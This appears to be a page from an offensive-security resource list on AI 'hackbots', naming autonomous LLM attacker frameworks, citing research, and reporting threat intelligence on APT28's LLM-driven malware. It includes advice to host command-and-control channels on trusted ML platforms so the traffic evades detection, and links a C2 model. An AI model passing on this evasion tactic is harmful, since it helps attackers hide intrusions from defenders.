## **PoC** ### 1 click deploy or similar The three leading incumbents as of 7/2/2025 for hackbots are: - [Incalmo](https://github.com/bsinger98/Incalmo) Autonomous LLM-Based Multi-Stage Attacker. By [bsinger98](https://github.com/bsinger98) - [cai](https://github.com/aliasrobotics/cai) Bug Bounty AI, features agent co ordination and execution architecture. by [AliasRobotics](https://github.com/aliasrobotics) - [Rigging](https://rigging.dreadnode.io/) by [dreadnode](https://www.dreadnode.io/) highly customizable with the best data architecture in my opinion. If you do not require capabilities of your own python agents, consider [Nerve](https://github.com/evilsocket/nerve) by [evilsocket](https://x.com/evilsocket) which can be configured with yaml only. ### Frameworks - [Langchain]() is the incumbent, however for offsec purposes, consider [Rigging](https://rigging.dreadnode.io/), it's built by [dreadnode](https://www.dreadnode.io/), a offensive-AI company. [artkit](https://github.com/BCG-X-Official/artkit) - Automated prompt-based testing and evaluation of Gen AI applications under active maintenance as of 10/24. [haystack](https://github.com/deepset-ai/haystack) is another alternative general purpose component connector. ## **Details** Interaction frameworks are designed to connect components like models, vector DBs, file conversion utilities to pipelines (sometimes called prompt plumbing) with agents to interact with your data. [Paper](https://python.langchain.com/docs/get_started/introduction/) [Rigging presentation](https://github.com/dreadnode/conferences/blob/main/SOCON_2024/Ghosts%20on%20the%20Node.pdf) [Incalmo Paper](https://arxiv.org/abs/2501.16466) Assessing the capabilities of H1 2025 frontier models in offensive use cases. > Offensive high-level actions through expert agents. In 9 out of 10 networks in MHBench, LLMs using Incalmo achieve at least some of the attack goals. Note: As of 7/2/2025 MHBench is not public. ## Threat Intel LLM's are beginning to be used in operational settings as of 7/23/2025. This situation with practicality changes continuously with model improvements. The latest developments include APT-28 being identified to use [LLMs to program the malware as needed on the local machine](https://www.csoonline.com/article/4025139/novel-malware-from-russias-apt28-prompts-llms-to-create-malicious-windows-commands.html) , vs delivering all capabilities. AKA LAMEHUG. Ass [moo_hax](https://x.com/moo_hax/) put simply "*where there is compute, there is c2*". LLMs are covert channels. [This paper](https://arxiv.org/abs/2405.15652) from 2024 showed that whilst models like Llama-7B achieve low practical bitrates, the **opportunity to detect their usage was also low.** As we know, much better small models are coming online all the time, and their capabilities on tasks that involve constructive proofs (like many classes of vulnerabilities) continuously improve. C2 to trusted endpoints hosting LLM's is a new challenge for us to face, host your LLM or C2 channel on Databricks, HuggingFace, AzureML, Vertex, etc and you can obtain remote capabilities without challenges like domain categorization and to an extent, transparent proxying - the traffic should blend right in with existing multi-turn conversations. Basic LLM's for c2 usage can be found [testlllmc2]([https://huggingface.co/tensorblock/testllm-c2-GGUF) by [Kiddz](https://huggingface.co/Kiddyz)